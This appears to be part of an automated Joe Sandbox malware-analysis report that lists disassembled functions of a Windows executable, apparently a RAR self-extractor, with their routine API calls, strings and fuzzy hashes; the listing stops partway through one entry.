API ID: LibraryLoad$CommonControlsInitInitializeMalloc
String ID: riched20.dll$riched32.dll
API String ID: 448729520-3294723617
Opcode ID: 90f14c158bcb89b69ea4bae273e6414ebbc239f5036364857f5d8bbe2d5c0ea4
Instruction ID: bec1f3dff02ca963225762dc8c306ba0fdf2f44245cb56c0a91269f9c2818cf8
Opcode Fuzzy Hash: 90f14c158bcb89b69ea4bae273e6414ebbc239f5036364857f5d8bbe2d5c0ea4
Instruction Fuzzy Hash: F7F0E271B00308AFD7209FA1DC0DB8ABBE8EF40726F50042DE54493140D7B8A4018BA9

Function 00410FA3 Relevance: 10.6, APIs: 7, Instructions: 134
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040998E: GetVersionExW.KERNEL32(?), ref: 004099B3

FileTimeToLocalFileTime.KERNEL32(?,?,?,?), ref: 00410FD7
FileTimeToSystemTime.KERNEL32(?,?,?,?), ref: 00410FE7
SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00410FF3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00411001
SystemTimeToFileTime.KERNEL32(?,?), ref: 0041100B
FileTimeToSystemTime.KERNEL32(?,?,00000000,00000000,00000000,00000001), ref: 00411058
SystemTimeToFileTime.KERNEL32(?,?), ref: 004110D5

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 6f4f92a70eba09b3495600295f97cb808364c991bffa0b9bc98bbd9497c34473
Instruction ID: f4e3b1fa049264918395f3d3676c7671cc3ff43673ba9dc7e8ff30eccb9b6800
Opcode Fuzzy Hash: 6f4f92a70eba09b3495600295f97cb808364c991bffa0b9bc98bbd9497c34473
Instruction Fuzzy Hash: 3F41FB75E002189BCB14DFA5C8849EEBBF9FF4C310B14852EE946E7244D738A989CB65

Function 004110F3 Relevance: 9.1, APIs: 6, Instructions: 104
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToFileTime.KERNEL32(?,00411259,?,?), ref: 00411144
LocalFileTimeToFileTime.KERNEL32(00411259,?), ref: 00411170
FileTimeToSystemTime.KERNEL32(00411259,?), ref: 00411186
TzSpecificLocalTimeToSystemTime.KERNELBASE(00000000,?,?), ref: 00411196
SystemTimeToFileTime.KERNEL32(?,?), ref: 004111A4
SystemTimeToFileTime.KERNEL32(?,?), ref: 004111AE

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: Time$File$System$Local$Specific
String ID:
API String ID: 3144155402-0
Opcode ID: 6b63271ff8b70f806080f35f48d49c6b52bacc33e5f661e2bc001a464882075a
Instruction ID: ff07d1204e9df2b29167d1fc2eddb3e11bcb12c5d2a1f7bcbe5d8ef3e2e57d95
Opcode Fuzzy Hash: 6b63271ff8b70f806080f35f48d49c6b52bacc33e5f661e2bc001a464882075a
Instruction Fuzzy Hash: 9D31327AA00219ABCF14DFE4C840AEFF7B9FF48710F04452AE945E7250E734A945CBA9

Function 0041A086 Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 0041A0A4

Part of subcall function 0041EB63: __mtinitlocknum.LIBCMT ref: 0041EB79
Part of subcall function 0041EB63: __amsg_exit.LIBCMT ref: 0041EB85
Part of subcall function 0041EB63: EnterCriticalSection.KERNEL32(0041A52B,0041A52B,?,00425008,00000004,0042DAA0,0000000C,00420EFE,00000000,0041A53A,00000000,00000000,00000000,?,0041E526,00000001), ref: 0041EB8D

___sbh_find_block.LIBCMT ref: 0041A0AF
___sbh_free_block.LIBCMT ref: 0041A0BE
RtlFreeHeap.NTDLL(00000000,00000000,0042D5E0,0000000C,0041EB44,00000000,0042D8B8,0000000C,0041EB7E,00000000,0041A52B,?,00425008,00000004,0042DAA0,0000000C), ref: 0041A0EE
GetLastError.KERNEL32(?,00425008,00000004,0042DAA0,0000000C,00420EFE,00000000,0041A53A,00000000,00000000,00000000,?,0041E526,00000001,00000214), ref: 0041A0FF

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 713418213fa3b924a5db022641309ed8e71f6ef471490119430b1649068a1123
Instruction ID: 73d86c86ae11ec172247dd6dba1c6c112c9550fe19059460788b477c0004c14d
Opcode Fuzzy Hash: 713418213fa3b924a5db022641309ed8e71f6ef471490119430b1649068a1123
Instruction Fuzzy Hash: 1401A275906315EBDB306F739C0ABDE3AA0AF04768F10411FF800A62D1DA3CA5D1DA5E

Function 00410CE4 Relevance: 7.5, APIs: 5, Instructions: 36
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410C38: ResetEvent.KERNEL32(?,00000200,?,?,00404FD2), ref: 00410C5E
Part of subcall function 00410C38: ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 00410C6E

ReleaseSemaphore.KERNEL32(?,00000020,00000000,021F1300,?,00000000,00410DF3,?,?,00401024,?,?,0040128E), ref: 00410D00
CloseHandle.KERNEL32(021F1304,021F1304,0044E590,?,00000000,00410DF3,?,?,00401024,?,?,0040128E), ref: 00410D21
DeleteCriticalSection.KERNEL32(021F14A0,?,00000000,00410DF3,?,?,00401024,?,?,0040128E), ref: 00410D37
FindCloseChangeNotification.KERNELBASE(?,?,00000000,00410DF3,?,?,00401024,?,?,0040128E), ref: 00410D43
CloseHandle.KERNEL32(?,?,00000000,00410DF3,?,?,00401024,?,?,0040128E), ref: 00410D4B

Part of subcall function 00410AAD: WaitForSingleObject.KERNEL32(?,000000FF,00410C7B,?), ref: 00410AB3
Part of subcall function 00410AAD: GetLastError.KERNEL32(?), ref: 00410ABF

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: Close$HandleReleaseSemaphore$ChangeCriticalDeleteErrorEventFindLastNotificationObjectResetSectionSingleWait
String ID:
API String ID: 565839277-0
Opcode ID: ca58e632b3b783b63512d94f15049283e17315acfd207e2999dda24762a21a4a
Instruction ID: 9a9c497621359c990a617e9c2e34a8bb028c7d4a7b3a09de16c58b541c2cbaaa
Opcode Fuzzy Hash: ca58e632b3b783b63512d94f15049283e17315acfd207e2999dda24762a21a4a
Instruction Fuzzy Hash: AAF09675101708DFD7316B70DD41BD6B7A9EF06354F10082AFA9B42120CB7778A1DB68

Function 00419830 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00419847
SHAutoComplete.SHLWAPI(?,00000010), ref: 0041987E

Part of subcall function 004119E6: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,00000000,000000FF,00409A30,?,00000000,?,00409B4A,00000000,-00000002,?,00000000,?), ref: 004119FC

FindWindowExW.USER32 ref: 0041986E

Strings

EDIT, xrefs: 00419852, 00419857, 0041986A

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 9899273405b88f4d302bfd59c2f9281fb6c9ea864ad29a30c1f38293d160aced
Instruction ID: 2b24fd0b246fdebf6b7f97274a92ca10bdbb336c928bdee4251268382986ee6e
Opcode Fuzzy Hash: 9899273405b88f4d302bfd59c2f9281fb6c9ea864ad29a30c1f38293d160aced
Instruction Fuzzy Hash: 1CF0E2323002186BD730A7259C05FFB366C9B82B50F480036FE05E2284D768D882C5BE

Function 0040855B Relevance: 6.1, APIs: 4, Instructions: 104
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,-80000000,?,00000000,00000003,-00000001,00000000,00000000,00000000,?,00000000,00406C45,00000000,00000005,?,00000011), ref: 004085EC
GetLastError.KERNEL32(?,00000000,00406C45,00000000,00000005,?,00000011,00000000,?,00000000,?,0000003A,00000802,?,00000000,00000802), ref: 004085F5
CreateFileW.KERNEL32(?,-80000000,?,00000000,00000003,00000000,00000000,?,?,00000800,?,00000000,00406C45,00000000,00000005,?), ref: 0040862D
GetLastError.KERNEL32(?,00000000,00406C45,00000000,00000005,?,00000011,00000000,?,00000000,?,0000003A,00000802,?,00000000,00000802), ref: 00408631

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 156eb4b2126d9bb5c547cf60d2f7ae02f1d96fc261b200f93c5351bfb089c77d
Instruction ID: c5a87be2614fc2427225c1be7d563ec5bc50c25864dd67b016cb74c9d05143e5
Opcode Fuzzy Hash: 156eb4b2126d9bb5c547cf60d2f7ae02f1d96fc261b200f93c5351bfb089c77d
Instruction Fuzzy Hash: 303128315147449BE7308B208D05BEB77D4EB44318F144E3EF9D4A23C0DBBA95498B5A

Function 00401851 Relevance: 6.1, APIs: 4, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00401856

Part of subcall function 00405ED9: __EH_prolog.LIBCMT ref: 00405EDE
Part of subcall function 00405ED9: _memset.LIBCMT ref: 00405F41
Part of subcall function 00405ED9: _memset.LIBCMT ref: 00405F4D
Part of subcall function 00405ED9: _memset.LIBCMT ref: 00405F6B

Part of subcall function 0040B5F2: __EH_prolog.LIBCMT ref: 0040B5F7

_memset.LIBCMT ref: 00401999
_memset.LIBCMT ref: 004019A8
_memset.LIBCMT ref: 004019B7

Part of subcall function 0041A41A: _malloc.LIBCMT ref: 0041A434

Part of subcall function 00409DAE: __EH_prolog.LIBCMT ref: 00409DB3

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _memset$H_prolog$_malloc
String ID:
API String ID: 4233843809-0
Opcode ID: 36059e55d940a062022a2cea67ec7cd2dea6fb99428014aa4d92f54cf199f618
Instruction ID: 83d0fe6ce04b428a854620314f95cb6379f2e49c9d0d95c367f0477aa6296122
Opcode Fuzzy Hash: 36059e55d940a062022a2cea67ec7cd2dea6fb99428014aa4d92f54cf199f618
Instruction Fuzzy Hash: EB5115B1845F849EC321DF7988912D7FFE0AB19310F94496E91FE93282D7352658CB2A

Function 00408A28 Relevance: 6.1, APIs: 4, Instructions: 59fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6,004325AC,?,00000000,?,?,00408C38,?,00000000,00000800,?,00000000), ref: 00408A39
ReadFile.KERNELBASE(?,?,00000800,00000000,00000000,004325AC,?,00000000,?,?,00408C38,?,00000000,00000800,?,00000000), ref: 00408A51
GetLastError.KERNEL32(?,00408C38,?,00000000,00000800,?,00000000), ref: 00408A89
GetLastError.KERNEL32(?,00408C38,?,00000000,00000800,?,00000000), ref: 00408AA4

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: c610f9014d8eeb7b064f26712c9d4da67e362c16071d56148ef50c45903ee7ce
Instruction ID: 5b86b98262a763a2b1aac685d922e531e20719b04805407dfc6ef191c52c8e13
Opcode Fuzzy Hash: c610f9014d8eeb7b064f26712c9d4da67e362c16071d56148ef50c45903ee7ce
Instruction Fuzzy Hash: A111A030700204EFCF209B60CE0096A37A8AB40374B10813FE9A6A5BC0DE3C8C51DF6A

Function 0040746E Relevance: 6.0, APIs: 2, Strings: 1, Instructions: 783COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00407473

Part of subcall function 004186BB: _wcscpy.LIBCMT ref: 004187A4

_memcmp.LIBCMT ref: 00407A3B

Strings

E, xrefs: 00407E23

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: H_prolog_memcmp_wcscpy
String ID: E
API String ID: 1926841707-3568589458
Opcode ID: d7cafb4cde09b7c00f65498caacab5e277d94ded439c8c29843c9d87f48543b7
Instruction ID: cf964ad92503e1b09d677bb6f917278792a2ea00dcb53aa951a45fd549403193
Opcode Fuzzy Hash: d7cafb4cde09b7c00f65498caacab5e277d94ded439c8c29843c9d87f48543b7
Instruction Fuzzy Hash: CA62B970D086459EDF25DB64C484BEA7BA55F01308F0840FFE94A6B2D2C77D7A84CB5A

Function 0040CE09 Relevance: 6.0, APIs: 4, Instructions: 29windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0040CE1A
GetMessageW.USER32 ref: 0040CE2B
TranslateMessage.USER32(?), ref: 0040CE35
DispatchMessageW.USER32(?), ref: 0040CE3F

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: Message$DispatchPeekTranslate
String ID:
API String ID: 4217535847-0
Opcode ID: 3bcc0019167008ed6046610103470990902ffce4856a4c3d90b832063c98dd80
Instruction ID: 32a85e4d4a826c9d45554aa75601f0bac722d611be20bb766d5c71021b96714b
Opcode Fuzzy Hash: 3bcc0019167008ed6046610103470990902ffce4856a4c3d90b832063c98dd80
Instruction Fuzzy Hash: 32E0ED72E0222AABCB20ABE5AC4CCDBBF6CEE062517404021BD05E2014E638D116C7F5

Function 00407F9D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00407FA2

Part of subcall function 00401851: __EH_prolog.LIBCMT ref: 00401856
Part of subcall function 00401851: _memset.LIBCMT ref: 00401999
Part of subcall function 00401851: _memset.LIBCMT ref: 004019A8
Part of subcall function 00401851: _memset.LIBCMT ref: 004019B7

Part of subcall function 0040145F: __EH_prolog.LIBCMT ref: 00401464

_wcscpy.LIBCMT ref: 00408041

Strings

rar, xrefs: 00407FF4

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: H_prolog_memset$_wcscpy
String ID: rar
API String ID: 2876264062-1792618458
Opcode ID: 5d3b9128a0cda9991b45ac0e1a56650690facc272257e9d69e79fa538dbc655e
Instruction ID: 53bce053d24c49e1f6fcf424261482c96304109e3676d75e0d2a0acb115d3bfa
Opcode Fuzzy Hash: 5d3b9128a0cda9991b45ac0e1a56650690facc272257e9d69e79fa538dbc655e
Instruction Fuzzy Hash: E741A4319402589EDB20EB60C945BEA77B8AF14304F0408FFE48A77182DB795F88CB29

Function 00412276 Relevance: 4.6, APIs: 3, Instructions: 110COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 004122F1
_malloc.LIBCMT ref: 0041230B

Part of subcall function 0041CAFE: __FF_MSGBANNER.LIBCMT ref: 0041CB21
Part of subcall function 0041CAFE: __NMSG_WRITE.LIBCMT ref: 0041CB28
Part of subcall function 0041CAFE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00420EB4,00000000,00000001,00000000,?,0041EAED,00000018,0042D8B8,0000000C,0041EB7E), ref: 0041CB75

_memset.LIBCMT ref: 0041235E

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: AllocateException@8HeapThrow_malloc_memset
String ID:
API String ID: 3965744532-0
Opcode ID: b6dab7f7b9b14b1c3dd6a49bb6a0dc6428f545d5e75d9d5cfda1de9083c9dada
Instruction ID: ffd5469e8927a66b05899aa66e51adf59dc711c071ef3bb7ac8bf15c27b8a745
Opcode Fuzzy Hash: b6dab7f7b9b14b1c3dd6a49bb6a0dc6428f545d5e75d9d5cfda1de9083c9dada
Instruction Fuzzy Hash: B34104B0905748ABEB25DE38D9847DAB7D4AB14305F10486FE896D3241D7BCA9E0C71D

Function 00408841 Relevance: 4.6, APIs: 3, Instructions: 99fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,0040B850,?,?,00000000,?,?,00412073,?,?,?,00000001), ref: 0040885C
WriteFile.KERNEL32(00000001,?,00004000,?,00000000,?,?,0040B850,?,?,00000000,?,?,00412073,?,?), ref: 00408894
WriteFile.KERNELBASE(00000001,?,00000001,?,00000000,?,?,?,?,?,0040B850,?,?,00000000,?,?), ref: 004088BE

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 8a72d7d9aea97a559a9e7ba6f4dcb7e4cfa17ec02cb55baa4c7163d4e8fa20d6
Instruction ID: 05fe826ef37b03cd11afcdec12f62b331215059efb2e71ec0f12e3647d5e0f1d
Opcode Fuzzy Hash: 8a72d7d9aea97a559a9e7ba6f4dcb7e4cfa17ec02cb55baa4c7163d4e8fa20d6
Instruction Fuzzy Hash: 813181B2600504EFDF24EF65CA8497B77AAEB54310750C53EE596A7280DB38A9058B29

Function 00409051 Relevance: 4.6, APIs: 3, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 00409E12: _wcslen.LIBCMT ref: 00409E18

CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,?,?,?,004091A6,?,00000001,00000000,?,?,?,?,?), ref: 00409081
CreateDirectoryW.KERNEL32(?,00000000,00000000,?,00000800,00000000,00000000,?,?,?,004091A6,?,00000001,00000000,?,?), ref: 004090B0
GetLastError.KERNEL32(00000000,00000000,?,?,?,004091A6,?,00000001,00000000,?,?,?,?,?,?,004065CE), ref: 004090C9

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 227378bfe0dee5d36e4d509f5fb4af626e29390fe32d93a2db47539ae2859bb7
Instruction ID: cf922ee7dd3167ab8cdc3191a550b1e98f982940cb6efb8051210f9b24962699
Opcode Fuzzy Hash: 227378bfe0dee5d36e4d509f5fb4af626e29390fe32d93a2db47539ae2859bb7
Instruction Fuzzy Hash: 5701F53511424565DB3167258C05BBB22589B85B84F48003BF980F62D7D77CDC8296BE

Function 0040DFC8 Relevance: 4.6, APIs: 3, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040DFCD
_wcscpy.LIBCMT ref: 0040DFED

Part of subcall function 00410901: _wcslen.LIBCMT ref: 00410917
Part of subcall function 00410901: _wcscpy.LIBCMT ref: 0041092D

_wcscpy.LIBCMT ref: 0040E00B

Part of subcall function 00406F1D: __EH_prolog.LIBCMT ref: 00406F22

Part of subcall function 00406E41: __EH_prolog.LIBCMT ref: 00406E46

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
